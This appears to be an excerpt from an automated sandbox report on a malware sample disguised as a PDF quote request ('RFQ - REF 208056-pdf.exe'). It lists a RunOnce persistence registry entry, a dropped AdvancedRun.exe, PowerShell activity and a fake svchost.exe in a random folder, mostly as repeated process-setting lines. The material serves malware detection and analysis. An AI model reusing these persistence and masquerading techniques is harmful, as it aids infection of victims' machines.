                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce XZFSGXzndMljLVEovPfqdSJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeCode function: 11_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ - REF 208056-pdf.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\3f77e94d-b01b-49a3-88ba-e6fd38451fb3\AdvancedRun.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\Microsoft.NET\Framework\fEPqNDVRKakftSbrsO\svchost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
